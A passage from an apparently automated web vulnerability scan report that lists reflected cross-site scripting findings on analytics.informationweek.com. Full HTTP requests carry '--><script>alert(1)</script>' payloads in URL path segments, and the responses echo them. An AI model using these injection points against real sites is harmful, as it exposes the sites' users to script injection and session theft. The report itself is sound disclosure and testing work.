ce=http%3A%2F%2Fanalytics.informationweek.com%2Fjsfbbbc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3cd9c91875d%2Fgetdata.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js">
...[SNIP]...

3.36. http://analytics.informationweek.com/js/getdata.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /js/getdata.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2750a--><script>alert(1)</script>2ac3af659de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/getdata.js2750a--><script>alert(1)</script>2ac3af659de HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=uasp4coas67ebpa7qr50c2rti7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=dWFzcDRjb2FzNjdlYnBhN3FyNTBjMnJ0aTc%3D; expires=Sun, 12-Dec-2010 01:40:11 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/js/getdata.js2750a--><script>alert(1)</script>2ac3af659de&gateway=true
Content-Type: text/html
Content-Length: 45861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2F%2Fanalytics.informationweek.com%2Fjs%2Fgetdata.js2750a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ac3af659de&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/getdata.js2750a--><script>alert(1)</script>2ac3af659de">
...[SNIP]...

3.37. http://analytics.informationweek.com/js/jquery-1.3.1.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /js/jquery-1.3.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e0a5--><script>alert(1)</script>6251c524583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=5a7jhk46qfflq96b7tkk7fj244; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=NWE3amhrNDZxZmZscTk2Yjd0a2s3ZmoyNDQ%3D; expires=Sun, 12-Dec-2010 01:40:20 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js&gateway=true
Content-Type: text/html
Content-Length: 45879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
A%2F%2Fanalytics.informationweek.com%2Fjs9e0a5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6251c524583%2Fjquery-1.3.1.min.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js">
...[SNIP]...

3.38. http://analytics.informationweek.com/js/jquery-1.3.1.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /js/jquery-1.3.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload e723d--><script>alert(1)</script>c3717aeb084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=qa278gqvlj7nnq9p8inp10qg24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=cWEyNzhncXZsajdubnE5cDhpbnAxMHFnMjQ%3D; expires=Sun, 12-Dec-2010 01:40:31 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084&gateway=true
Content-Type: text/html
Content-Length: 45879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ormationweek.com%2Fjs%2Fjquery-1.3.1.min.jse723d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec3717aeb084&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084">
...[SNIP]...

3.39. http://analytics.informationweek.com/js/jquery.prettyPhoto.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /js/jquery.prettyPhoto.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d91ad--><script>alert(1)</script>877e6cf0607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=5kbm7qrn4bsup8an04p74i2p31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=NWtibTdxcm40YnN1cDhhbjA0cDc0aTJwMzE%3D; expires=Sun, 12-Dec-2010 01:40:07 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js&gateway=true
Content-Type: text/html
Content-Length: 45883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2F%2Fanalytics.informationweek.com%2Fjsd91ad--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E877e6cf0607%2Fjquery.prettyPhoto.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js">
...[SNIP]...

3.40. http://analytics.informationweek.com/js/jquery.prettyPhoto.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /js/jquery.prettyPhoto.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a7297--><script>alert(1)</script>0f839360ee4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:38:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Set-Cookie: PHPSESSID=kg5ttl9r52o71ts6b4lfp9svp7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=a2c1dHRsOXI1Mm83MXRzNmI0bGZwOXN2cDc%3D; expires=Sun, 12-Dec-2010 01:40:17 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://analytics.informationweek.com/js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4&gateway=true
Content-Type: text/html
Content-Length: 45883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
tionweek.com%2Fjs%2Fjquery.prettyPhoto.jsa7297--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f839360ee4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4">
...[SNIP]...

3.41. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/1/Application-optimization/Application-performance-optimization.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 31bd7--><script>alert(1)</script>ccf4cc96713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
cript%3Ealert%281%29%3C%2Fscript%3Eccf4cc96713%2F1%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html">
...[SNIP]...

3.42. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/1/Application-optimization/Application-performance-optimization.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c5371--><script>alert(1)</script>435eecb50aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
Cscript%3Ealert%281%29%3C%2Fscript%3E435eecb50aa%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html">
...[SNIP]...

3.43. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/1/Application-optimization/Application-performance-optimization.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e86ed--><script>alert(1)</script>a235d674e47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea235d674e47%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html">
...[SNIP]...

3.44. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/1/Application-optimization/Application-performance-optimization.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 772ba--><script>alert(1)</script>2d612bfec11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d612bfec11&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11">
...[SNIP]...

3.45. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/1/Application-optimization/Application-performance-optimization.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload af5ae--><script>alert(1)</script>57fed5e992d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:41:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 54893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
script%3Ealert%281%29%3C%2Fscript%3E57fed5e992d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1">
...[SNIP]...

3.46. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/10/Messaging-and-collaboration/Messaging-collaboration.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 13258--><script>alert(1)</script>d54dc696a59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:58 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54dc696a59%2F10%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html">
...[SNIP]...

3.47. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/10/Messaging-and-collaboration/Messaging-collaboration.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9c016--><script>alert(1)</script>7e4d87e08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
